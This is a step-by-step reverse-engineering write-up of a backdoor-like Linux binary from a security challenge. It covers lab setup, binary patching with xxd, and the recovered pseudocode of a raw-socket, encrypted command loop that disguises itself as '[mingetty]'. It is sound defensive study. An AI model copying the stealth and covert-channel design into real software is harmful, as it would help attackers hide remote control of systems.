In this document
we’re going to go through the process of reverse engineering an application.
The goal of the document is to provide the answers to “The Reverse Challenge”
as well as to learn the basics of reverse-engineering on the way.
The first step is to
ensure that we have downloaded “the-binary” provided for the challenge
correctly and without alteration by runing md5(R*) on it.
[albert@sandbox reverse-ch]$ md5sum the-binary.tar.gz 857f9f32cbe7a277710d4fa57670316a the-binary.tar.gz
After this we’re
ready to unpack the file;
[albert@sandbox reverse-ch]$ tar -xzvf the-binary.tar.gz reverse/ reverse/README.html reverse/the-binary
To have an idea of
what we’re dealing with we check the kind of file;
[albert@sandbox reverse]$ file the-binary the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped
As expected from such
kind of file it’s stripped, but it’s interesting to note that it’s
statically linked, what means that it will have all the library functions it
uses inside. This could be done for the following reasons;
To avoid including the necessary information to link with dynamic libraries (and hence facilitate the tracing of calls and the reverse-engineering of the application).
To avoid possible problems in case the binary is run in a system without the required libraries.
To difficult
reverse-engineering by having all the library functions and the applications
own functions in a single binary.
As it is an ELF
binary, we can try to get more information through “objdump”
The new information
we get is this;
[albert@sandbox the-binary]$ objdump -x the-binary the-binary: file format elf32-i386 the-binary architecture: i386, flags 0x00000102: EXEC_P, D_PAGED start address 0x08048090 Program Header: LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 filesz 0x00024222 memsz 0x00024222 flags r-x LOAD off 0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12 filesz 0x0000c094 memsz 0x00011970 flags rw- Sections: Idx Name Size VMA LMA File off Algn 0 .init 00000008 08048080 08048080 00000080 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 1 .text 0001f53c 08048090 08048090 00000090 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 2 __libc_subinit 00000004 080675cc 080675cc 0001f5cc 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 3 .fini 00000008 080675d0 080675d0 0001f5d0 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 4 .rodata 00004c4a 080675d8 080675d8 0001f5d8 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 5 .data 0000c084 0806d228 0806d228 00024228 2**2 CONTENTS, ALLOC, LOAD, DATA 6 .ctors 00000008 080792ac 080792ac 000302ac 2**2 CONTENTS, ALLOC, LOAD, DATA 7 .dtors 00000008 080792b4 080792b4 000302b4 2**2 CONTENTS, ALLOC, LOAD, DATA 8 .bss 000058dc 080792bc 080792bc 000302bc 2**2 ALLOC 9 .note 00000d5c 00000000 00000000 000302bc 2**0 CONTENTS, READONLY 10 .comment 00000ea6 00000000 00000000 00031018 2**0 CONTENTS, READONLY objdump: the-binary: no symbols
The most interesting
part is that we have a “__libc_subinit” header, which means that we have a
“libc” linked in.
Next, we take a look inside the binary with “strings”
[albert@sandbox reverse]$ strings the-binary
We get a long set of
strings. Looking arround we find the following intersting entries;
First Group;
[mingetty] /tmp/.hj237349 /bin/csh -f -c "%s" 1> %s 2>&1 TfOjG /sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:. PATH HISTFILE linux TERM /bin/sh /bin/csh -f -c "%s"
All this entries seem
quite interesting. First what looks lake a faked “process name” for “ps”,
next a temporary file name, a format string to execute one command redirecting
standard I/O, what looks like a password (TfOjG), environment variables for a
shell, a shell invocation command and another format string to execute one
command, but this time without redirection. This looks as it could be the
constants of the application.
Second group;
The second group
comes inmediatelly after the first, and seems also to be a group of constants.
Some of them as a sample;
RESOLV_SERV_ORDER RESOLV_SPOOF_CHECK warn warn off RESOLV_MULTI RESOLV_REORDER RESOLV_ADD_TRIM_DOMAINS RESOLV_OVERRIDE_TRIM_DOMAINS gethostby*.getanswer: asked for "%s", got CNAME for "%s" gethostby*.getanswer: asked for type %d(%s), got %d(%s)
They seem to be DNS related, so perhaps the resolv library is linked, but a “strings” on our resolv library doesn’t seem to match. We check with;
[albert@sandbox reverse]$ strings /usr/lib/libresolv.a| grep RESOLV_OVERRIDE_TRIM_DOMAINS [albert@sandbox reverse]$
No output, so it
really seems that we missed this one. We’ll try to find which library it
belongs to;
[albert@sandbox reverse]$ find /usr/lib -name "*.a" -exec grep RESOLV_OVERRIDE_TRIM_DOMAINS {} \; Binary file /usr/lib/libc.a matches [albert@sandbox reverse]$
So it seems we found
the library it belongs to; “libc”. On the other hand it was normal to expect
this library to be there, as it is the most basic one and we had already spotted
it with “objdump”
Third group;
This seemed to be
another group at first, as there was quite a lot of “garbage” and the next
string found was not related to DNS, but after the analysis on the second group,
we see that the string “@(#) The Linux C library 5.3.12” clearly defines
what “libc” version we’re dealing with.
A little research
through “rpmfind.net” allows us to see that this library is the one
distributed by default with “RedHat 6.2”. So perhaps “the-binary” was
compiled in this platform.
This also gives us a
hint on the process we’re doing. We’re looking for strings on a different
library (we’re using RedHat 7.1, with LibC , so it would be possible that some
strings don’t match. To avoid this we download the sources for “The Linux C
library 5.3.12” and search for the strings there.
While still checking
strings we come with a really special one;
*nazgul*
Nazgul is the name of
a kind of “Dark Spirit” in the novel “The Lord of the Rings”. Appropriate
name for a hacking thing. But doing our check on the LibC Sources
[albert@sandbox albert]$ grep -Hr \*nazgul\* /usr/src/redhat/SOURCES/libc/* /usr/src/redhat/SOURCES/libc/nls/msgcat.h:#define MCMagic "*nazgul*" /usr/src/redhat/SOURCES/libc/nls/msgcat.h: char magic[MCMagicLen]; /* Magic cookie "*nazgul*" */ [albert@sandbox albert]$
we find out
(surprisingly) that it’s part of it!! That reminds us something; always check
your assumptions. They can be wrong!!
We keep looking and
don’t notice anything suspicious or that doesn’t match our LibC 5.3.12
source files. So our research through “strings” is done.
Our next step will be
to start with the disassembly and execution of the application, but for that we
have to set up a proper environment. The binary we want to execute could be
malicious.
It would be good to
set up one environment with VMWare like described in (R*), but we don’t have a
VMWare license. So we’ll go with what we have; 2 PCs. On one of them we run
Win98, on the other Linux 7.1 (it could have been better with a 6.2 as is the
one that comes with LibC 5.3.12, or Linux 7.3, the most current, but we only
have 7.1 at hand).
We connect them with a crossed ethernet
cable and configure them on a private network. The Linux box with IP
192.168.1.1 and the Win98 with IP 192.168.1.7.
On the Win98 box we install;
On the Linux box we install;
Tripwire to check the system integrity after executions of “the-binary”
Fenris to trace “the-binary” activity
Gdb to do
reverse-engineering and controlled tracing of “the-binary”
We configure the Linux box in a way that it sends ALL the network traffic to the Win98 box. We do it configuring 2 things;
The default route for the Linux box goes to the Win98 one
We tell the Linux box to use DNS services in our Win98 box (even that we don't have a DNS server there!)
We will try to execute the application as a non-privileged user, as we don't
know what kind of action this application can take. So we create a user for
running this application and we'll check with Tripwire from time to time to
ensure that our system hasn't been affected in any way.
Our first run of "the-binary" will be with fenris so we can see what happens. The fenris distribution we use initially comes with a set of signatures from a "libc5" library. That will come handy to analyze our binary, as the system we use has a "libc6" library but as we've seen "the-binary" comes with a "libc5" library.
Befor runing "the-binary" we start our sniffer in the Win98 box. Then we go with our first run of "the-binary";
[tstusr@sandbox reverse]$ ../fenris/fenris ./the-binary fenris 0.04b (2699, 22396) - program execution path analysis tool Brought to you by Michal Zalewski <lcamtuf@coredump.cx> * WARNING: cannot load 'fnprints.dat' fingerprints database. +++ Executing './the-binary' (pid 25725, static) +++ 25725:-- SYS exit (-1) = ??? +++ Process 25725 exited with code 255 +++ ************************************************************ * Hmm, call me suspicious. I tried to skip libc prolog for * * this application, but it seems to me I skipped way too * * much. Maybe this program is too smart for me? Maybe it * * was compiled in some exotic place? Consider using -s * * option for now, and contact my author! * ************************************************************ >> Exit condition: no more processes to trace
Ok, so we do as the application suggest, use "-s" which reading the documentation informs us that will "disables automatic prolog detection" tracing all the libc initialization. We have no problem with that. So here we go;
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary fenris 0.02b (2334, 22396) - program execution path analysis tool Brought to you by Michal Zalewski <lcamtuf@coredump.cx>
- <CONTINUES, Snipped for brevity>
We get a not-so-long output that we inspect visually. It seems that the application has exited. Before looking through the output we check our sniffer and see no relevant activity. We also ensure with "tripwire" that everything is OK. Then we take a look through the output and we see the following;
14719:01 local fnct_8 () 14719:01 + fnct_8 = 0x8048134 14719:01 # No matches for signature CD18AE48. 14719:02 local fnct_9 (0, 0, 0) 14719:02 + fnct_9 = 0x805720c 14719:02 # Matches for signature 5527EA2B: geteuid libc_geteuid 14719:03 SYS geteuid () = 503 14719:03 <805721a> cndt: if-above block (signed) +16 executed 14719:02 ...return from function = <void> 14719:02 <8048182> cndt: conditional block +8 executed 14719:02 local fnct_10 (-1) 14719:02 + fnct_10 = 0x8055fbc 14719:02 # No matches for signature 09B18AA8.
There's a call to a "local fnct_10 (-1)", this seems to be the "start of the end", as a "-1" value usually means an error. We see that the previous call was a call go "geteuid" that returns 503, the UID of the tstusr. So it seems that if "the-binary" is not run by root it detects it and stops execution.
We could run it as root, but that's not advisable at all as we still don't know much about the functionality of "the-binary". So the other solution is to patch the program so we can skip this check.
To do that we need to disassemble "the-binary" and look where to modify the code. For that purpose we disassemble "the-binary" with IdaFree.
Once in IdaFree we load "the-binary" which we have first copied into a directory on the Win98 box.
This gives us a nice disassembly of "the-binary". On the previous execution of fenris we've seen that the call to geteuid (fnct_9) was made from "fnct_8", that starts at position 0x8048134, so we go to the routine in that possition and look for a call to the routine at position 0x805720c (fnct_9). We find it easily. The code is;
.text:0804816B mov [ebp+var_44D8], edx .text:08048171 mov [ebp+var_44C4], 10h .text:0804817B call sub_0_805720C .text:08048180 test eax, eax .text:08048182 jz short loc_0_804818C .text:08048184 push 0FFFFFFFFh .text:08048186 call sub_0_8055FBC .text:0804818B nop
Using the information we got from our fenris execution we can make this more readable by using IdaFree to rename the fucntions we have identified so far. These are;
After renaming these 2 functions we get;
.text:0804816B mov [ebp+var_44D8], edx .text:08048171 mov [ebp+var_44C4], 10h .text:0804817B call geteuid .text:08048180 test eax, eax .text:08048182 jz short loc_0_804818C .text:08048184 push 0FFFFFFFFh .text:08048186 call error_exit .text:0804818B nop
That's more understandable than before. Now we can see that the "jz short loc_084818C" jump is executed for root. We can just change that and make it the other way around, so changing a "jz" for a "jnz". Looking at the intel reference we find that we have to change the value 0x74 at position 0x08048182 (opcode for a "jz") with a 0x75 (opcode for a "jnz").
So now that we know what we want to achieve
it's time to patch "the-binary"
We could use the "-P" option of fenris to patch "on-the-fly" the binary. That would be;
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -P 0x8048182:0x75 ./the-binary
But we later on will want to also inspect it with "gdb". There the way to patch it is by the "set" command
gdb> set *0x8048182=0x75
It's also foreseeable that we will end up with more patches than this one, so it's better to have a patched binary. Looking around we find that xxd (part of the vim package) has the ability to patch binaries in a convenient way. First we have to find out what position in the binary file corresponds later on to 0x8048182.
We can check this visually using IdaFree and it's "Options\ Dump/Normal view" or by pressing F4. This gives us a dump so we can see where our "0x74" is. With xxd we obtain a pretty much identical kind of dump and we can easily spot the point by comparing visually. We have to modify the byte at position 0000182. That gives us the path to follow in further modifications; we have to subtract 0x8048000 from the memory location to modify to get the file offset to modifiy.
So we prepare a patched binary with the following commands;
[tstusr@sandbox reverse]$ cp the-binary the-binary-NOROOT [tstusr@sandbox reverse]$ echo '0000182: 75' | xxd -r - the-binary-NOROOT
Now we have a clear way to patch "the-binary". Because we will apply more than one patch and we might try to patch different parts, we can set up a simple script that patches all the parts. So we write a script as;
#!/bin/sh if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi cp the-binary-dressed $1 # Run without being root echo '0000182: 75' | xxd -r - $1
A complete script with all "developed" patches is given on the extra files that come with this analysis.
Our goal is to check the activity that "the-binary" produces. For that we keep using fenris to try to find out. That will bring us to a cycle of
So we're going to discuss the problems found and how to get around them without the detail of how to perform each step.
The next execution of fenris
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT
generates a longer output where we find;
14836:02 local fnct_13 () 14836:02 + fnct_13 = 0x80571e8 14836:02 # Matches for signature BCF79788: fork libc_fork vfork 14836:03 SYS fork () = 14837 14836:-- SIGNAL 17 (Child exited) - will not be handled 14836:03 <80571f6> cndt: if-above block (signed) +16 executed 14836:02 ...return from function = <void> 14836:02 <80481df> cndt: conditional block +7 executed 14836:02 local fnct_14 (0) 14836:02 + fnct_14 = 0x8055fbc 14836:02 # No matches for signature 09B18AA8.
So there's a fork(), and looking on how things go, we see that the application calls the function at 0x8055fbc which we know is the one that we named "error_exit" before.
So it seems that the "interesting" work gets done by the child process of the fork().
Looking at the fenris documentation (README file) we see that we have an option to trace child processes; "-f". So we try again;
[tstusr@sandbox reverse]$ ../fenris/fenris -f -s -L ../fenris/support/fn-libc5.dat ./the-binary-NOROOT
with the following outcome;
14850:03 fork () = 14851 >> OS error : Operation not permitted [1] >> Error condition: PTRACE_ATTACH failed >> This condition occoured while tracing pid 14850 (eip 80571f0). >> Traced 293 user CPU cycles (0 libcalls, 13 fncalls, 4 syscalls). ************************************************** * If you believe this is because of programming * * error, please report above message, along with * * information about your working environment and * * traced application, to the author of this * * utility (e-mail: lcamtuf@coredump.cx). Thanks! * **************************************************
Again, no luck, as the documentation states, "-f" might have some problems, and they're affecting us.
So we take another approach; if we want to follow the child process, just change the code that makes it jump one way or another. In this case we have to change another "jz" for another "jnz" at position 0x080481df.
We apply the patch and try again
We get the same outcome, with another fork() call. So we repeat our process and move on. This leads to a file patched with;
#!/bin/sh if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi cp the-binary $1 # Run without being root echo '0000182: 75' | xxd -r - $1 # Switch behaviour of parent and child on first fork echo '00001DF: 75' | xxd -r - $1 # Switch behaviour of parent and child on second fork echo '0000200: 75' | xxd -r - $1
When we run the patched binary again with fenris we get a large amount of output, so we better use the "-o" option on fenris to get all this output in a file.
[tstusr@sandbox reverse]$ ../fenris/fenris -s -L ../fenris/support/fn-libc5.dat -o fenris.out \ > ./the-binary-NOROOT-NOFORK1-NOFORK2
Fenris doesn't stop, we stop it after about 10 seconds of execution.
Problem with "socket" and "socketcall_10"
Looking at fenris.out becomes a hard task but we can still find some things. We can see a lot of repetition on what it seems to be two different loops. But looking between the two main "repetition groups" we find the following;
14897:02 local fnct_20 (2, 3, 11) 14897:02 + fnct_20 = 0x8056cf4 14897:02 # No matches for signature 93D3112B. 14897:03 SYS socket (PF_INET, SOCK_RAW, 11 [nvp]) = -1 (Operation not permitted) 14897:03 <8056d22> cndt: if-above block (signed) +13 executed 14897:02 ...return from function = <void> 14897:02 // function has accessed non-local memory:
So it seems that "the-binary" is trying to open a RAW socket. It obviously can't because only root can do that. Later on the second "repetition" group we see a lot of;
14897:02 local fnct_21 (-1, l/bffff334, 2048, 0) 14897:02 + l/bffff334 (maxsize 2060) = stack of fcnt_8 (0 down) 14897:02 # No matches for signature 16E2ECD3. 14897:03 SYS socketcall_10 (0xbfffb610 <invalid>) = -9 (Bad file descriptor) 14897:03 <8056b78> cndt: if-above block (signed) +13 executed
So it seems that we're trying to do some kind of socketcall with a bad file descriptor. Probably the one we haven't been able to open on the previous "socket" operation.
It's quite obvious that moving through this output would be too hard, so it's time to do some analysis on the disassembly of "the-binary".
We can see that IdaFree has identified a big amount of functions. We can be pretty sure that most of them are library functions, but which?
Obviously it would be nice to recognize as much of the library functions as possible. We have several ways to achieve this;
Without doubt the first two options are the most appropiate (FLIRT or Dress, both signature based). But the third one also comes handy to reinforce the output generated by this options (at least dress, as we haven't tried FLIRT).
The reason for the reinforcement comes from the fact that several functions have identical signatures, for example getsockopt and setsockopt. Dress can't tell which one is which. With our third option (manual recognition of "INT 80h" calls) we can clearly tell one from the other.
So next step we "dress" "the-binary".
[tstusr@sandbox reverse]$ ../fenris/dress -F ../fenris/support/fn-libc5.dat the-binary the-binary-dressed dress - stripped static binary recovery tool by <lcamtuf@coredump.cx> * WARNING: cannot load 'fnprints.dat' fingerprints database. [+] Loaded 5400 fingerprints... [*] Code section at 0x08048090 - 0x080675cc, offset 144 in the file. [*] For your initial breakpoint, use *0x8048090 [+] Locating CALLs... 371 found. [+] Matching fingerprints... [*] Writing new ELF file: [+] Cloning general ELF data... [+] Setting up sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment [+] Preparing new symbol tables... [+] Copying all sections: .init .text .fini .rodata .data .ctors .dtors .bss .note .comment [+] All set. Detected fingerprints for 209 of 371 functions.
(Note: the WARNING message is because we're not executing dress from the fenris directory or providing the path to fnprints.dat, but that's not a problem since we only want the fingerprints of the functions on libc5 to be used).
Now we take "the-binary-dressed" to IDA and watch the new output. That looks completely different than before!
If we look at the list of functions (menu "View/Functions") we'll see that we got a lot of the library functions identified. Even then, we still have some confusion with "recvfrom___sendto" and "recvfrom___sendto_0" among others. If we need to clarify any of these confusions we can try with the third method described before. In the specific case of the "recvfrom___sendto" and "recvfrom___sendto_0" it resolves the doubt immediately.
But the third method also comes handy to identify some functions not identified by dress, like for example;
and some others (less useful) like "wait4" and "brk".
So the third method proves to be really useful on reaching to some points that the "fingerprint recognizers" fail.
Now we're ready to navigate through the code more easily and try to understand what happens.
We have seen that the places where we've had to patch the binary so far where on the same function. So we'll start looking at this function.
Here we have to be really patient and persistent to start getting all the information out of the disassembly. This is quite an intuitive task, but we can make progress with some "semi-automatic" recognition of variables (both global and local).
To do that we will rename some variables so we can tell the type they are. We'll look at the library calls, look at the type of their parameters and then name the variable pushed in the stack accordingly. For that some times we'll have to track the assignment of some registers as they are pushed on the stack but have been assigned a value a long time ago.
We can also see, specially at the beginning of this function, that some variables are used to point to others, so we know they will be pointers.
Another thing we can do to "organize" the variables is to define structures for the things we recognize.
We'll take as an example the first call at "recv" in position ".text:080482C5" (in fact its not a random example, as we get quite a lot of information from this one).
Initially we have;
push 0 push 800h lea eax, [ebp+var_800] push eax mov ecx, [ebp+var_44C8] push ecx call recv mov esi, eax
This translates to "C" as;
"register esi" = recv ( var_44C8, &var_800, 800h, 0);
We see in the libc5 sources that "recv" structure has the following prototype;
int recv ((int __sockfd, void *__buff, size_t __len, unsigned int __flags);
So now we know that var_44C8 is a SocketFD and that var_800 is an array of at least 2048 (800h) bytes long.
But we can push it even further. We know that this "recv" call will receive an IP paket on it's buffer, so we know what structure the "var_800" buffer will hold!
So we define this structure (basically) by using IdaFree's structure definition interface.
We go to "View/Structure" and insert the following structures;
0000 iphdr struc ; (sizeof=0x14) 0000 ihl_version db ? 0001 TOS db ? 0002 len dw ? 0004 id dw ? 0006 frag_off dw ? 0008 TTL db ? 0009 protocol db ? 000A crc dw ? 000C saddr dd ? 0010 daddr dd ? 0014 iphdr ends 0014 0000 ; ------------------------------------- 0000 0000 rawIPpacket struc ; (sizeof=0x800) 0000 hdr iphdr ? 0014 data db 2028 dup(?) 0800 rawIPpacket ends
Then we go to where the "var_800" variable is defined (the fastest way is to get in top of the "var_800" invocation in the code we're looking and hit enter) and define it as of having the structure "rawIPpacket". For IdaFree to allow to do this we will have first to undeclare (with the "u" key) all the variables from var_7FF to var_7EA, then we will be able to go to "var_800" select "Edit/Struct/Delcare struct var..." and select our "rawIPpacket" structure.
After recognizing more variables this way, we get quite a change on our variable names;
From This To This var_44F0 = dword ptr -44F0h
var_44EC = dword ptr -44ECh
var_44E8 = dword ptr -44E8h
var_44E4 = dword ptr -44E4h
var_44E0 = dword ptr -44E0h
var_44DC = dword ptr -44DCh
var_44D8 = dword ptr -44D8h
var_44D4 = dword ptr -44D4h
var_44D0 = dword ptr -44D0h
var_44CC = dword ptr -44CCh
var_44C8 = dword ptr -44C8h
var_44C4 = dword ptr -44C4h
var_44C0 = dword ptr -44C0h
var_44BC = byte ptr -44BCh
var_43BC = byte ptr -43BCh
var_11D8 = byte ptr -11D8h
var_11C8 = word ptr -11C8h
var_11C6 = word ptr -11C6h
var_11C4 = dword ptr -11C4h
var_11B8 = byte ptr -11B8h
var_1190 = byte ptr -1190h
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
var_FFE = byte ptr -0FFEh
var_FFD = byte ptr -0FFDh
var_FFC = byte ptr -0FFCh
var_FFB = byte ptr -0FFBh
var_FFA = byte ptr -0FFAh
var_FF9 = byte ptr -0FF9h
var_FF8 = byte ptr -0FF8h
var_FF7 = byte ptr -0FF7h
var_FF6 = byte ptr -0FF6h
var_FF5 = byte ptr -0FF5h
var_FF4 = byte ptr -0FF4h
var_FF3 = byte ptr -0FF3h
var_FF2 = byte ptr -0FF2h
var_800 = byte ptr -800h
var_7FF = byte ptr -7FFh
var_7FF = byte ptr -7FFh
var_7FE = byte ptr -7FEh
var_7FD = byte ptr -7FDh
var_7FC = byte ptr -7FCh
var_7F0 = byte ptr -7F0h
var_7EF = byte ptr -7EFh
var_7EE = byte ptr -7EEh
var_7ED = byte ptr -7EDh
var_7EC = byte ptr -7ECh
var_7EA = byte ptr -7EAh
arg_4 = dword ptr 0Chvar_RandomValue?= dword ptr -44F0h
var_0Value? = dword ptr -44ECh
var_3rdBufferPtr= dword ptr -44E8h
var_AddrPtr = dword ptr -44E4h
var_2ndBufPtr = dword ptr -44E0h
var_tmpFD = dword ptr -44DCh
var_BufDat2Ptr = dword ptr -44D8h
var_BufDatPtr = dword ptr -44D4h
var_BuffPtr = dword ptr -44D0h
var_acceptFD = dword ptr -44CCh
var_mainSD = dword ptr -44C8h
var_AcceptAddrLen= dword ptr -44C4h
var_setsockopt_optval= dword ptr -44C0h
var_Buf256Bytes = byte ptr -44BCh
var_TCPRecvBuf = byte ptr -43BCh
var_AcceptAddr = byte ptr -11D8h
var_bindSockAddr= sockaddr_in ptr -11C8h
var_Addr = byte ptr -11B8h
var_3rdBuffer = byte ptr -1190h
var_2ndBuf = byte ptr -1000h
var_Buf = rawIPpacket ptr -800h
This will enormously simplify the reading of the code.
We can also change some global variable names this way. Here we count with extra help from IdaFree which gives us a "view/Cross reference" option to identify where and how every variable is accessed.
Our final result for the uninitialized variables (.bss segment) is
.bss:0807E770*gPID dd ? .bss:0807E770* .bss:0807E774*gPID2 dd ? .bss:0807E774* .bss:0807E778*gWord1 dd ? .bss:0807E778* .bss:0807E77C gDouble1 dd ? .bss:0807E780*gbdaddr dd ? .bss:0807E780* .bss:0807E784*gWord2_0_or_2 dd ?
which is a big improvement from the initial situation. We also recover some sense on the constants (.rodata segment) where we can recognize the "[mingetty]" string we saw on the "strings" analysis.
Overall, we can now start navigating our main function with a lot more clues than initially.
With all the variables set, we're now ready to start looking at the assembly code and try to understand what it does.
The routine starts by preparing the stack, allocating space in it, and saving some registers. Next it initializes some variables and then does the check to see if it's running as root. If it's not it exits (position .text:08048186). We have already developed a patch to prevent this.
Next it seems that it's doing something strange, but a cautious analysis reveals that it changes argv[0] (the string by which the program was invoked) and changes it to "[mingetty]". Obviously it tries to disguise itself. This also reinforces the idea that we had that this was the "main()" function of the application, as the only parameter accessed corresponds to what we would expect (argv[0]).
After that it forks twice, with a call to setsid() in the middle and allowing only the child to continue execution. This converts the application in a daemon. We have also developed a patch to prevent this.
We're now at loc_0_804820C. Here the application does a chdir("/") and closes all the standard file descriptors (input, output and error), which is also a common practice in daemons.
Next it initializes some variables and does a call to an unknown function with time as a parameter. Like;
strange_function ( time() );
We don't know what this function does, and as it's result (if it has any) seems to be completely ignored we will leave the function for the moment.
The next call is quite obvious and it brings us to the problem we found with the "socket" call. It is a call like this
var_mainSD = socket(AF_INET, SOCKRAW, 0Bh);
Opening raw sockets is only allowed to root, but we still don't know what this binary do, so we'll want to avoid using raw sockets. We'll deal with that shortly.
But first we see what else the application does. After opening the socket it SIG_IGNores (by calling signal(xxx,SIG_IGN)) the signals SIGHUP (1), SIGTERM (0Fh) and SIGCHLD (17h). It assigns some pointer variables to point where they have to and then does;
"register esi" = recv ( var_mainSD, &var_Buf, 2048, 0);
Once this is done it does three checks on the received data;
If any of this conditions fail it goes to the end of a big loop where it does a "usleep(10000)" and goes back to the "recv" call we have already seen.
Once the checks are satisfied, it calls a function with the following parameters
decrypt_function ( esi-16h, var_BufDat2Ptr, var_2ndBufPtr);
Knowing that;
We can deduct that probably this function will transform all the bytes received in var_Buffer.Data, from the 3rd element to the end and leave the results of such transformation in "var_2ndBuf". Knowing the kind of binary we're talking about and (because it was announced in the challenge) that it has an "encryption" mechanism, we can be quite sure that this is the "decrypt_function".
After this transformation is done, the second byte of the var_2ndBuf is used for a "case" statement where there are 12 different cases. So this byte has to have a value between 1 and 12 to be able to execute one of the cases. If the value is not between this values the binary will jump to the default case, where (as we've seen before) it will "usleep(10000)" before going back to the "recv" call.
So to wrap-up, the structure of the main function is aproximately as follows;
main (int argc, char* argv[]) { INIT_VARIABLES; if ( geteuid()!= 0 ) error_exit(1); SET (argv[0] = "[mingetty]"); signal ( SIGCHLD, SIG_IGN ); if ( fork()!=0 ) error_exit(0); setsid(); signal ( SIGCHLD, SIG_IGN ); if ( fork()!=0 ) error_exit(0); chdir("/"); close (stdin); close (stdout); close (stderr); INIT_MORE_VARS; strange_function ( time() ); var_mainSD = socket (AFINET, SOCKRAW, 0Bh); signal ( SIGHUP, SIG_IGN ); signal ( SIGTERM, SIG_IGN ); signal ( SIGCHLD, SIG_IGN ); INIT_EVEN_MORE_VARS; for (;;) { bytes_recv = recv (var_mainSD, &var_Buf, 2048, 0); if ((var_Buf.hdr.TOS==0Bh) && (var_Buf.data[0]==2) && (bytes_recv > 200)) { decrypt_function ( bytes_recv - 16h, &(var_Buf.data[2]), &var_2ndBuf ); switch ( var_2ndBuf[1] ) { case 1 : //SOMETHING case 2 : ..(etc).. up to case 12: //SOMETHING break; default : ; } } usleep(10000); } }
Now it would be nice to check all our assumptions. It would be good to see the execution of the binary providing some input that satisfies the first 3 checks and see what happens with the input provided (and what the decrypt_function does). But to do that we have to first solve a pending problem.
Now what we want is to see what was happening with "socket" and "socketcall" quite a long time ago. We focus again on the code related to the "socket" and "recv" function;
.text:0804825C push 0Bh .text:0804825E push 3 .text:08048260 push 2 .text:08048262 call socket .text:08048267 mov [ebp+var_mainSD], eax : : .text:080482B0 push 0 .text:080482B2 push 800h .text:080482B7 lea eax, [ebp+var_Buf] .text:080482BD push eax .text:080482BE mov ecx, [ebp+var_mainSD] .text:080482C4 push ecx .text:080482C5 call recv
That we've seen it translates to
var_mainSD = socket (AF_INET, SOCKRAW, 0x0b); : recv (var_mainSD, &var_Buf, 2048, 0);
So the problem is that we cannot open a Raw Socket and later on read information from it. Here one fast patch comes to mind. We know that previously the binary closes the standard file descriptors (standard input, output and error). The solution could be to use the standard input to "recv" the information.
For that we do the following;
So our new "prepare-patch" script now looks like;
#!/bin/sh if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi cp the-binary-dressed $1 # Run without being root echo '0000182: 75' | xxd -r - $1 # Switch behaviour of parent and child on first fork echo '00001DF: 75' | xxd -r - $1 # Switch behaviour of parent and child on second fork echo '0000200: 75' | xxd -r - $1 # Avoid closing STDIN echo '0000218: 9090 9090 90' | xxd -r - $1 # Substitute socket call for a xor ax,ax echo '0000262: 6631 c090 90' | xxd -r - $1 # Read instead of recv on main() echo '00002C6: 42F0' | xxd -r - $1
After applying it we're ready to send "packets" through the standard input and move forward.
Let's try our patch. We will generate a packet consisting of 256 bytes with the consecutive values from 0 to 255 (use your preferred way to achieve such a file). We will modify the bytes at offsets 09h and 16h to allow it to comply with the 3 checks we have seen before.
The prepared packet looks like this;
[tstusr@sandbox reverse]$ xxd tstpacket 0000000: 0001 0203 0405 0607 080b 0a0b 0c0d 0e0f ................ 0000010: 1011 1213 0215 1617 1819 1a1b 1c1d 1e1f ................ 0000020: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f !"#$%&'()*+,-./ 0000030: 3031 3233 3435 3637 3839 3a3b 3c3d 3e3f 0123456789:;<=>? 0000040: 4041 4243 4445 4647 4849 4a4b 4c4d 4e4f @ABCDEFGHIJKLMNO 0000050: 5051 5253 5455 5657 5859 5a5b 5c5d 5e5f PQRSTUVWXYZ[\]^_ 0000060: 6061 6263 6465 6667 6869 6a6b 6c6d 6e6f `abcdefghijklmno 0000070: 7071 7273 7475 7677 7879 7a7b 7c7d 7e7f pqrstuvwxyz{|}~. 0000080: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f ................ 0000090: 9091 9293 9495 9697 9899 9a9b 9c9d 9e9f ................ 00000a0: a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf ................ 00000b0: b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf ................ 00000c0: c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf ................ 00000d0: d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf ................ 00000e0: e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef ................ 00000f0: f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff ................
Now we have everything ready to do another test to the application. This time we will execute it under "gdb" up to the point after the "transforming_function" is called
[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)... (gdb) break *0x08048311 Breakpoint 1 at 0x8048311 (gdb) run < tstpacket Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < tstpacket warning: shared library handler failed to enable breakpoint Breakpoint 1, 0x08048311 in ?? () (gdb)
Now we look at the two buffers passed to the function. To do it we disassemble the call with its parameters to find out where exactly the buffers are.
